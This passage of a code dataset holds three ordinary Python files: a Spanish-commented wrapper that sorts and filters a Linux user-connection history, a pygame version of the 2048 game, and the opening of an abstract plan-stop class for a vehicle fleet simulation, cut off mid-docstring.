split, join para unir texto\r\n print(\"\\t\\t \".join(cabecera))\r\n for i in range(0, len(listaConOrdenadas)):\r\n print(\"\\t\\t \".join(listaConOrdenadas[i]))\r\n print(\"\\r\")\r\n print(\" \".join(pie))\r\n print(\"\\r\")\r\n print(\"Cantidad de conexiones listadas para el usuario\", args.usuario, len(listaConOrdenadas), \".\")\r\n\r\ndef filtro(listaConOrdenadas,cabecera):\r\n # Saco el guion que es una bolsa...\r\n for i in range(0,len(listaConOrdenadas)):\r\n del listaConOrdenadas[i][7]\r\n\r\n noHayf=False\r\n\r\n if \"u\" in args.filtro:\r\n listaNueva = list(filter(lambda x: x[0], listaConOrdenadas))\r\n for listaConOrdenadas in listaNueva:\r\n del listaConOrdenadas[0]\r\n del cabecera[0]\r\n else:\r\n listaNueva = listaConOrdenadas\r\n if \"f\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"Fecha\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n del listaNueva[x][i]\r\n del listaNueva[x][i]\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n else:\r\n noHayf=True\r\n if \"t\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"Term\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"h\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"Host\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"c\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"H.Con\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n if noHayf:\r\n del listaNueva[x][i+2]\r\n else:\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"n\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"H.Des\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n if noHayf:\r\n del listaNueva[x][i+2]\r\n else:\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"d\" in args.filtro:\r\n for i in range(0,len(cabecera)):\r\n if \"T.Con\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n if noHayf:\r\n del listaNueva[x][i+2]\r\n else:\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n\r\n\r\n# Se definen los modificadores\r\nparser.add_argument(\"-u\", \"--usuario\", type=str, help=\"Usuario a desplegar sus conexiones.\", action=\"store\")\r\n\r\nparser.add_argument(\"-r\", \"--redondeo\", help=\"Despĺiega el tiempo total de conexiones.\", action=\"store_true\")\r\n\r\n# Se ordena el resultado dependiendo del parametro\r\nparser.add_argument(\"-o\", \"--orden\", type=str, choices=[\"u\", \"t\", \"h\", \"d\"], help=\"Ordena segun el criterio. {u} se ordenara por nombre. {t} se ordena por nombre de terminal. {h} se ordena por host. {d} se ordena por su duracion\")\r\n\r\n#\r\nparser.add_argument(\"-i\", \"--inverso\", help=\"Ordena por orden inverso.\", action=\"store_true\")\r\n\r\n# [-f {u,t,h,f,c,n,d}]\r\nparser.add_argument(\"-f\", \"--filtro\", type=str, choices=[\"u\", \"t\", \"h\", \"f\", \"c\", \"n\", \"d\"], nargs='+', help=\"Filtra por cualquiera de estos valores: {u} \")\r\n\r\n# Validamos que no hayan errores\r\ntry:\r\n args = parser.parse_args()\r\nexcept SystemExit as e:\r\n exit(25)\r\n\r\n# Cargamos el script\r\nej1YParametros = ['/root/ej1_historial_usuarios_conectados.sh']\r\n\r\nej1YParametros.append(\"-u\")\r\nej1YParametros.append(args.usuario)\r\n\r\n# Enviamos los parametros\r\nif args.redondeo:\r\n ej1YParametros.append(\"-r\")\r\n\r\n# Creamos el proceso\r\nproceso = Popen(ej1YParametros, stdout=PIPE, stderr=PIPE)\r\n\r\n# Causa la ejecucion del proceso y trae el resultado\r\nsalida= proceso.communicate()\r\n\r\n# Validamos que el proceso no haya dado errores\r\nif proceso.returncode > 0:\r\n print(salida[0].decode(), file=sys.stderr, end=\"\")\r\n exit(proceso.returncode)\r\n\r\nif salida[1].decode() != \"\":\r\n print(salida[1].decode(), file=sys.stderr, end=\"\")\r\n exit(0)\r\n\r\n# Se carga lista por cada linea obtenida\r\nlista_conexiones_ej1 = salida[0].decode().split(\"\\n\")\r\n\r\n# Se elimina la ultima linea vacia\r\nlista_conexiones_ej1.pop(-1)\r\n\r\n# Aca se puede comenzar a escribir las lineas correspondientes a cada funcion\r\nhayQueOrdenar=False\r\nif not (args.orden == None):\r\n hayQueOrdenar=True\r\n# Hay que filtrar?\r\nhayQueFiltrar=False\r\nif not (args.filtro == None):\r\n hayQueFiltrar=True\r\n# En caso de i se retorna el inverso\r\nesReverso=False\r\nif args.inverso:\r\n esReverso=True\r\n\r\n# Si es necesario normalizar\r\nif hayQueOrdenar:\r\n\r\n # Se normaliza el texto\r\n listaConOrdenadas = normalizarlista(lista_conexiones_ej1)\r\n\r\n cabecera = listaConOrdenadas[0]\r\n pie = listaConOrdenadas[int(len(listaConOrdenadas)) - 1]\r\n\r\n # Borro cebecera y pie. Tambien se borra el enter con el objetivo de normalizar y luego ordenar\r\n listaConOrdenadas.pop(0)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n\r\n # Ordeno segun lo solicitado\r\n if (args.orden == \"u\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[0], reverse=esReverso)\r\n\r\n if (args.orden == \"t\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[1], reverse=esReverso)\r\n\r\n if (args.orden == \"h\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[2], reverse=esReverso)\r\n\r\n if (args.orden == \"d\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[9], reverse=esReverso)\r\n\r\n# filtro(listaConOrdenadas)\r\n\r\n # Imprimo el resultado si no hay que filtrar\r\n if not hayQueFiltrar:\r\n imprimo_lista(listaConOrdenadas, cabecera, pie)\r\n\r\n# Hay que filtrar?\r\nif hayQueFiltrar:\r\n # Se normaliza el texto\r\n if not hayQueOrdenar:\r\n listaConOrdenadas = normalizarlista(lista_conexiones_ej1)\r\n\r\n cabecera = listaConOrdenadas[0]\r\n pie = listaConOrdenadas[int(len(listaConOrdenadas)) - 1]\r\n\r\n # Borro cebecera y pie. Tambien se borra el enter con el objetivo de normalizar y luego ordenar\r\n listaConOrdenadas.pop(0)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n\r\n if not len(args.filtro) >= 7:\r\n filtro(listaConOrdenadas,cabecera)\r\n imprimo_lista_filtrada(listaConOrdenadas, cabecera, pie)\r\n else:\r\n print(\"Al menos un campo debe estar visible, no pudiendose ocultar todos.\")\r\n exit(20)\r\n\r\n\r\n\r\n\r\n# En caso de que no existan otros modificadores\r\nif not hayQueOrdenar and not hayQueFiltrar:\r\n for i in range(0, len(lista_conexiones_ej1)):\r\n print(lista_conexiones_ej1[i])\r\n", "repo_name": "rsantomauro/Linux-UsuariosConectados", "sub_path": "ej2_historial_usuarios_conectados_exp.py", "file_name": "ej2_historial_usuarios_conectados_exp.py", "file_ext": "py", "file_size_in_byte": 8126, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 136, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 136, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 143, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 147, "usage_type": "attribute"}]}
+{"seq_id": "72541013531", "text": "#!/usr/bin/env python3\n\nimport os\nimport random\n\nimport pygame\n\n\nclass Colors:\n background = (250, 248, 239)\n board_background = (187, 173, 160)\n cell = {\n 0: (205, 193, 180),\n 2: (238, 228, 218),\n 4: (238, 225, 201),\n 8: (243, 178, 122),\n 16: (246, 150, 100),\n 32: (247, 124, 95),\n 64: (247, 95, 59),\n 128: (237, 208, 115),\n 256: (237, 204, 98),\n 512: (237, 201, 80),\n 1024: (237, 197, 63),\n 2048: (237, 194, 46),\n }\n font = {\n 2: (119, 110, 101),\n 4: (119, 110, 101),\n 8: (249, 246, 242),\n 16: (249, 246, 242),\n 32: (249, 246, 242),\n 64: (249, 246, 242),\n 128: (249, 246, 242),\n 256: (249, 246, 242),\n 512: (249, 246, 242),\n 1024: (249, 246, 242),\n 2048: (249, 246, 242),\n }\n header = (238, 228, 218)\n header_font = (119, 110, 101)\n\n\nclass Text:\n def __init__(self, text, color, size):\n self.font = pygame.font.Font(\"OpenSans-Bold.ttf\", size)\n self.text = self.font.render(text, True, color)\n self.width, self.height = self.text.get_size()\n\n def draw(self, x, y):\n G.window.blit(self.text, (x, y))\n\n\nclass RoundedSquare:\n def __init__(self, a, r, color):\n self.a = a\n self.r = r\n self.color = color\n\n def draw(self, x, y):\n pygame.draw.rect(G.window, self.color, (x + self.r, y, self.a - 2 * self.r, self.a))\n pygame.draw.rect(G.window, self.color, (x, y + self.r, self.a, self.a - 2 * self.r))\n pygame.draw.circle(G.window, self.color, (x + self.r, y + self.r), self.r)\n pygame.draw.circle(G.window, self.color, (x + self.a - self.r, y + self.r), self.r)\n pygame.draw.circle(G.window, self.color, (x + self.a - self.r, y + self.a - self.r), self.r)\n pygame.draw.circle(G.window, self.color, (x + self.r, y + self.a - self.r), self.r)\n\n\nclass Cell:\n font_size = 52\n\n def __init__(self, value):\n self.value = value\n self.tile = RoundedSquare(G.cell_size - 2 * G.grid_spacing, G.radius, Colors.cell[value])\n if value:\n self.text = Text(str(value), Colors.font[value], self.font_size)\n\n def draw(self, x_real, y_real):\n self.tile.draw(x_real + G.grid_spacing, y_real + G.grid_spacing + G.H.height)\n if self.value:\n self.text.draw(x_real + (G.cell_size - self.text.width) / 2, y_real + (G.cell_size - self.text.height) / 2 + G.H.height)\n\n\nclass Animation:\n def __init__(self, row_start, col_start, row_end, col_end, value):\n self.value = value\n self.row_start = row_start\n self.col_start = col_start\n self.row_end = row_end\n self.col_end = col_end\n self.move_distance_x = (col_end - col_start) * G.cell_size\n self.move_distance_y = (row_end - row_start) * G.cell_size\n self.move_step_x = self.move_distance_x // G.move_time\n self.move_step_y = self.move_distance_y // G.move_time\n self.start_pos_x = col_start * G.cell_size\n self.start_pos_y = row_start * G.cell_size\n\n def draw(self):\n pos_now_x = self.start_pos_x + self.move_step_x * (G.move_time - G.move_time_remaining)\n pos_now_y = self.start_pos_y + self.move_step_y * (G.move_time - G.move_time_remaining)\n\n G.CellsPrerendered[self.value].draw(pos_now_x, pos_now_y)\n\n def __repr__(self):\n return f\"Anim(start=({self.row_start}, {self.col_start}, dist=({self.col_end - self.col_start}, {self.row_end - self.row_start}))\"\n\n\nclass Header:\n height = 80\n font_size = 39\n\n def __init__(self):\n pass\n\n def draw(self):\n pygame.draw.rect(G.window, Colors.header, (0, 0, G.dim, self.height))\n text = Text(f\"score: {G.score}\", Colors.header_font, self.font_size)\n text.draw((G.dim - text.width) // 2, (self.height - text.height) // 2)\n\n\nclass Game:\n debug_headless = False\n debug_anim = False\n debug_exit_status = None\n\n size = 4\n cell_size = 120\n dim = size * cell_size\n radius = 9\n grid_spacing = 6\n fps = 60\n values = [0] + [2 ** i for i in range(1, 11 + 1)]\n score = 0\n new_score = 0\n\n def __init__(self):\n self.M = [[0 for _ in range(self.size)] for _ in range(self.size)] # Matrix\n self.spawn_cell()\n self.spawn_cell()\n self.reset_animations()\n\n def start(self):\n self.H = Header()\n self.move_time = 60 if self.debug_anim else 20\n self.reset_animations()\n pygame.display.init()\n pygame.font.init()\n self.clock = pygame.time.Clock()\n self.window = pygame.display.set_mode((self.dim, self.dim + self.H.height), vsync=1)\n pygame.display.set_caption(\"2048\")\n self.CellsPrerendered = {i: Cell(i) for i in self.values}\n\n self.main_loop()\n\n pygame.quit()\n\n def main_loop(self):\n self.game_notOver = True\n self.move_time_remaining = 0\n dir_x, dir_y = 0, 0\n while self.game_notOver:\n self.clock.tick(self.fps)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_notOver = False\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_ESCAPE]:\n self.game_notOver = False\n\n if self.move_time_remaining == 0:\n if self.cells_being_animated:\n # things to be done when move ends\n self.reset_animations()\n self.spawn_cell()\n if self.score != self.new_score:\n self.score = self.new_score\n print(self.score)\n\n pressed_key = True\n if keys[pygame.K_LEFT] or keys[pygame.K_a]: # ←\n dir_x, dir_y = -1, 0\n elif keys[pygame.K_RIGHT] or keys[pygame.K_d]: # →\n dir_x, dir_y = 1, 0\n elif keys[pygame.K_UP] or keys[pygame.K_w]: # ↑\n dir_x, dir_y = 0, -1\n elif keys[pygame.K_DOWN] or keys[pygame.K_s]: # ↓\n dir_x, dir_y = 0, 1\n else:\n pressed_key = False\n\n if pressed_key:\n self.move_time_remaining = self.move_time\n self.move_matrix(dir_x, dir_y)\n\n if self.debug_anim and (keys[pygame.K_y] or keys[pygame.K_n]):\n self.debug_exit_status = keys[pygame.K_y]\n self.game_notOver = False\n else:\n self.move_time_remaining -= 1\n\n self.redraw()\n\n def redraw(self):\n G.window.fill(Colors.board_background)\n\n self.H.draw()\n\n for row, row_of_cells in enumerate(self.M):\n for col, val in enumerate(row_of_cells):\n if (row, col) in self.cells_being_animated:\n G.CellsPrerendered[0].draw(col * self.cell_size, row * self.cell_size)\n else:\n G.CellsPrerendered[val].draw(col * self.cell_size, row * self.cell_size)\n\n for anim in self.animations:\n anim.draw()\n\n pygame.display.update()\n\n def spawn_cell(self):\n if not self.debug_anim:\n free_tiles = [(row, col) for row, row_of_cells in enumerate(self.M) for col, val in enumerate(row_of_cells) if val == 0]\n row, col = random.choice(free_tiles)\n self.M[row][col] = random.choice([2, 2, 2, 2, 2, 2, 2, 2, 2, 4])\n\n def reset_animations(self):\n self.animations = set()\n self.cells_being_animated = set()\n\n def add_animation(self, row_start, col_start, row_end, col_end, value):\n if not self.debug_headless:\n self.animations.add(Animation(row_start, col_start, row_end, col_end, value))\n self.cells_being_animated.add((row_end, col_end))\n\n def move_cell(self, row_start, col_start, row_end, col_end):\n self.add_animation(row_start, col_start, row_end, col_end, self.M[row_start][col_start])\n self.M[row_end][col_end] = self.M[row_start][col_start]\n self.M[row_start][col_start] = 0\n\n def merge_cells(self, row_absorbent, col_absorbent, row_absorbed, col_absorbed):\n if not self.debug_headless:\n # ↓ absorbent animation, check if absorbent is not already being moved\n if (row_absorbent, col_absorbent) not in self.cells_being_animated:\n self.add_animation(row_absorbent, col_absorbent, row_absorbent, col_absorbent, self.M[row_absorbent][col_absorbent])\n # ↓ absorbed animation\n self.add_animation(row_absorbed, col_absorbed, row_absorbent, col_absorbent, self.M[row_absorbed][col_absorbed])\n\n self.M[row_absorbent][col_absorbent] *= 2\n self.M[row_absorbed][col_absorbed] = 0\n self.no_longer_mergeable.add((row_absorbent, col_absorbent))\n\n self.new_score += self.M[row_absorbent][col_absorbent]\n\n def find_maximum_movement(self, row_start, col_start, dir_x, dir_y):\n if dir_x != 0: # x direction\n col_end = col_start + dir_x\n while 0 < col_end < self.size - 1 and self.M[row_start][col_end] == 0 and (self.M[row_start][col_end + dir_x] == 0 or self.M[row_start][col_start] == self.M[row_start][col_end + dir_x]) and (row_start, col_end + dir_x) not in self.no_longer_mergeable:\n col_end += dir_x\n return col_end\n else: # y direction\n row_end = row_start + dir_y\n while 0 < row_end < self.size - 1 and self.M[row_end][col_start] == 0 and (self.M[row_end + dir_y][col_start] == 0 or self.M[row_start][col_start] == self.M[row_end + dir_y][col_start]) and (row_end + dir_y, col_start) not in self.no_longer_mergeable:\n row_end += dir_y\n return row_end\n\n def move_matrix(self, dir_x, dir_y):\n self.no_longer_mergeable = set()\n if dir_x != 0: # x direction\n for row in range(0, self.size):\n for col_start in (range(self.size - 2, -1, -1) if dir_x > 0 else range(0, self.size)):\n if self.M[row][col_start] and not ((col_start == 0 and dir_x < 0) or (col_start == self.size - 1 and dir_x > 0)):\n col_end = self.find_maximum_movement(row, col_start, dir_x, dir_y)\n if self.M[row][col_end] == 0:\n self.move_cell(row, col_start, row, col_end)\n elif self.M[row][col_start] == self.M[row][col_end] and (row, col_end) not in self.no_longer_mergeable:\n self.merge_cells(row, col_end, row, col_start)\n else: # y direction\n for col in range(0, self.size):\n for row_start in (range(self.size - 2, -1, -1) if dir_y > 0 else range(0, self.size)):\n if self.M[row_start][col] and not ((row_start == 0 and dir_y < 0) or (row_start == self.size - 1 and dir_y > 0)):\n row_end = self.find_maximum_movement(row_start, col, dir_x, dir_y)\n if self.M[row_end][col] == 0:\n self.move_cell(row_start, col, row_end, col)\n elif self.M[row_start][col] == self.M[row_end][col] and (row_end, col) not in self.no_longer_mergeable:\n self.merge_cells(row_end, col, row_start, col)\n\n\nos.chdir(os.path.dirname(__file__))\n\nG = Game()\nif __name__ == \"__main__\":\n G.start()\n", "repo_name": "rekin5320/2048", "sub_path": "game2048.py", "file_name": "game2048.py", "file_ext": "py", "file_size_in_byte": 11494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pygame.font.Font", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.display.init", "line_number": 145, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 146, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 147, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 147, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 149, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pygame.K_y", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygame.K_n", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygame.K_y", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 220, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 220, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 225, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 226, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 290, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 290, "usage_type": "call"}, {"api_name": "os.path", "line_number": 290, "usage_type": "attribute"}]}
+{"seq_id": "29249680792", "text": "# -------------------------------------------------------------------------------------------------------------------- #\n# standard distribution imports\n# -----------------------------\nimport logging\n\n# additional module imports (> requirements)\n# ------------------------------------------\nimport numpy as np\nfrom abc import abstractmethod, ABCMeta\nfrom typing import List, Dict, Tuple, Optional\n\n# src imports\n# -----------\nfrom src.simulation.Legs import VehicleRouteLeg\nfrom src.simulation.Vehicles import SimulationVehicle\nfrom src.fleetctrl.planning.PlanRequest import PlanRequest\nfrom src.routing.NetworkBase import NetworkBase\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# global variables\n# ----------------\nfrom src.misc.globals import *\n\nLOG = logging.getLogger(__name__)\nLARGE_INT = 100000000\n\n\n# =================================================================================================================== #\n# ========= PLAN STOP CLASSES ======================================================================================= #\n# =================================================================================================================== #\n\n# class PlanStop:\n# def __init__(self, position, boarding_dict, max_trip_time_dict, earliest_pickup_time_dict, latest_pickup_time_dict,\n# change_nr_pax, planned_arrival_time=None, planned_departure=None, planned_arrival_soc=None,\n# locked=False, charging_power=0, started_at=None,\n# existing_vcl=None, charging_unit_id=None):\n\nclass PlanStopBase(metaclass=ABCMeta):\n \"\"\" this abstract class defines all methods a PlanStop-Class has to implement\n this class corresponds to one spatiotemporal action a vehicle is planned to do during a vehicle plan\n a vehicle plan thereby consists of an temporal ordered list of PlanStops which are performed one after another\n vehicles are moving between these different plan stops.\n \"\"\"\n \n @abstractmethod\n def get_pos(self) -> tuple:\n \"\"\"returns network position of this plan stop\n :return: network position tuple \"\"\"\n pass\n \n @abstractmethod\n def get_state(self) -> G_PLANSTOP_STATES:\n \"\"\" returns the state of the planstop \n :return: plan stop state\"\"\"\n \n @abstractmethod\n def get_list_boarding_rids(self) -> list:\n \"\"\"returns list of all request ids boarding at this plan stop\n :return: list of boarding rids\"\"\"\n \n @abstractmethod\n def get_list_alighting_rids(self) -> list:\n \"\"\" returns list of all request ids alighting at this plan stop\n :return: list of alighting rids\"\"\"\n \n @abstractmethod\n def get_charging_task_id(self) -> Tuple[int, str]:\n \"\"\" returns the id of the stationary charging process of the plan stop if present\n :return: charging task id (tuple(charging operator id, task id)); None if not present\"\"\"\n \n @abstractmethod\n def get_earliest_start_time(self) -> float:\n \"\"\" this function evaluates all time constraints and returns the\n earliest start time for the PlanStop\n :return: (float) earliest start time \"\"\"\n pass\n \n @abstractmethod\n def get_latest_start_time(self, pax_infos : dict) -> float:\n \"\"\" this function evaluates all time constraints and returns the \n latest start time of the Plan Stop.\n if maximum trip time constraints are applied, infos about boarding times are need to evaluate the\n latest drop off time constraints\n :param pax_infos: (dict) from corresponding vehicle plan rid -> list (boarding_time, deboarding time) (only boarding time needed)\n :return: (float) latest start time\"\"\"\n pass\n \n @abstractmethod\n def get_duration_and_earliest_departure(self) -> tuple:\n \"\"\" returns a tuple of planned stop duration and absolute earliest departure time at stop\n :return: (stop duration, earliest departure time) | None if not given\"\"\"\n \n @abstractmethod\n def get_started_at(self) -> float:\n \"\"\" this function returns the time this plan stop started at; None if not started by the vehicle yet\n :return: float of time or None\"\"\"\n \n @abstractmethod\n def get_change_nr_pax(self) -> int:\n \"\"\" get the change of person occupancy after this plan stop \n :return: change number pax (difference between boarding and deboarding persons)\"\"\"\n \n @abstractmethod\n def get_change_nr_parcels(self) -> int:\n \"\"\" get the change of parcel occupancy after this plan stop \n :return: change number parcels (difference between boarding and deboarding parcels)\"\"\"\n \n @abstractmethod\n def get_departure_time(self, start_time : float) -> float:\n \"\"\" this function returns the time the vehicle leaves the plan stop if it is started at start_time\n :param start_time: time the plan stop has been started\n :return: time vehicle is supposed to leave\"\"\"\n \n @abstractmethod\n def get_charging_power(self) -> float:\n \"\"\" returns the charging power at this plan stop \n :return: charging power\"\"\"\n \n @abstractmethod\n def get_boarding_time_constraint_dicts(self) -> Tuple[Dict, Dict, Dict, Dict]:\n \"\"\" returns a tuple of all boarding constraints dicts (rid -> time constraint)\n :return: dict earliest_boarding_time, latest_boarding_times, max_travel_times, latest_arrival_times\"\"\"\n \n @abstractmethod\n def get_planned_arrival_and_departure_time(self) -> Tuple[float, float]:\n \"\"\" returns time of arrival and departure planned within the plan\n :return: tuple of planned arrival time and planned departure time\"\"\"\n \n @abstractmethod\n def get_planned_arrival_and_departure_soc(self) -> Tuple[float, float]:\n \"\"\"returns the planned soc when arriving at plan stop\n :return: planned soc at start and end of charging process\"\"\"\n \n @abstractmethod\n def is_locked(self) -> bool:\n \"\"\"test for lock\n :return: bool True, if plan stop is locked\"\"\"\n \n @abstractmethod\n def is_locked_end(self) -> bool:\n \"\"\" ths for end lock\n :return: bool True, if plan stop is locked at end of plan stop (no insertion after this possible)\"\"\"\n \n @abstractmethod\n def is_infeasible_locked(self) -> bool:\n \"\"\" this if planstop is locked due to infeasible time constraints\n :return: True, if infeasible locked\"\"\"\n \n @abstractmethod\n def is_inactive(self) -> bool:\n \"\"\" this function evaluates if this is an inactive PlanStop (i.e. undefined duration and no tasks)\n :return: (bool) True if inactive, else False \"\"\"\n pass\n \n @abstractmethod\n def is_empty(self) -> bool:\n \"\"\" tests if nothing has to be done here and its just a routing target marker (i.e. reloc target)\n :return: (bool)\"\"\"\n \n @abstractmethod\n def set_locked(self, locked : bool):\n \"\"\" sets the locked state of the plan stop\n :param locked: True, if this plan stop should be locked\"\"\"\n \n @abstractmethod\n def set_infeasible_locked(self, infeasible_locked : bool):\n \"\"\" sets infeasible locked state if time constraints can no longer be fullfilled\n :param infeasible_locked: True, if infeasible locked state applied\"\"\"\n \n @abstractmethod\n def set_started_at(self, start_time : float):\n \"\"\"this function sets the time when the plan stop has been started by a vehicle\n :param start_time: float; simulation time when vehicle started the plan stop\"\"\"\n \n @abstractmethod\n def set_planned_arrival_and_departure_time(self, arrival_time : float, departure_time : float):\n \"\"\" set the planned arrival and departure time at plan stop\n :param arrival_time: time of vehicle arrival\n :param departure_time: planned time of departure\"\"\"\n \n @abstractmethod\n def set_duration_and_earliest_end_time(self, duration : float=None, earliest_end_time : float=None):\n \"\"\" can be used to reset duration and earliest end time of the plan stop (ignored if None)\n :param duration: new duration of plan stop\n :param earliest_end_time: new earliest end time of plan stop\"\"\"\n \n @abstractmethod\n def set_planned_arrival_and_departure_soc(self, arrival_soc : float, departure_soc : float):\n \"\"\" set the planned soc at arrival and departure at plan stop\n :param arrival soc: soc of vehicle at arrival\n :param departure_soc: soc at end of charging process\"\"\"\n \n @abstractmethod\n def update_rid_boarding_time_constraints(self, rid, new_earliest_pickup_time : float=None, new_latest_pickup_time : float=None):\n \"\"\" this method can be used to update boarding time constraints a request in this plan stop (if given)\n :param rid: request id\n :param new_earliest_pickup_time: new earliest pick up time constraint of rid\n :param new_latest_pickup_time: new latest pick up time constraint of rid\"\"\"\n \n @abstractmethod\n def update_rid_alighting_time_constraints(self, rid, new_maxmium_travel_time : float=None, new_latest_dropoff_time : float=None):\n \"\"\" this method can be used to update alighting time constraints a request in this plan stop (if given)\n :param rid: request id\n :param new_maxmium_travel_time: new maximum travel time constraint of rid\n :param new_latest_dropoff_time: new latest dropoff time constraint of rid\"\"\"\n \n @abstractmethod\n def copy(self):\n \"\"\" this function returns the copy of a plan stop\n :return: PlanStop copy\n \"\"\"\n pass\n\nclass PlanStop(PlanStopBase):\n \"\"\"this class corresponds to one spatiotemporal action a vehicle is planned to do during a vehicle plan\n a vehicle plan thereby consists of an temporal ordered list of PlanStops which are performed one after another\n vehicles are moving between these different plan stops.\n this class is the most general class of plan stops\"\"\"\n def __init__(self, position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={}, earliest_pickup_time_dict={}, latest_pickup_time_dict={},\n change_nr_pax=0, change_nr_parcels=0, earliest_start_time=None, latest_start_time=None, duration=None, earliest_end_time=None,\n locked=False, locked_end=False, charging_power=0, planstop_state : G_PLANSTOP_STATES=G_PLANSTOP_STATES.MIXED,\n charging_task_id: Tuple[int, str] = None, status: Optional[VRL_STATES] = None):\n \"\"\"\n :param position: network position (3 tuple) of the position this PlanStops takes place (target for routing)\n :param boarding_dict: dictionary with entries +1 -> list of request ids that board the vehicle there; -1 -> list of requests that alight the vehicle there\n :param max_trip_time_dict: dictionary request_id -> maximum trip time of all requests alighting at this stop to check max trip time constraint\n :param latest_arrival_time_dict: dictionary request_id -> absolute latest arival time of all requests alighting at this stop to check latest arrival time constraint\n :param earliest_pickup_time_dict: dictionary request_id -> earliest pickup time of all requests boarding at this stop to check earliest pickup time constraint\n :param latest_pickup_time_dict: dictionary request_id -> latest pickup time of all requests boarding at this top to check latest pickup time constraint\n :param change_nr_pax: (int) change of number of passengers at this point: number people boarding - number people alighting to check capacity constraint\n :param change_nr_parcels: (int) change of number of parcels at this point: 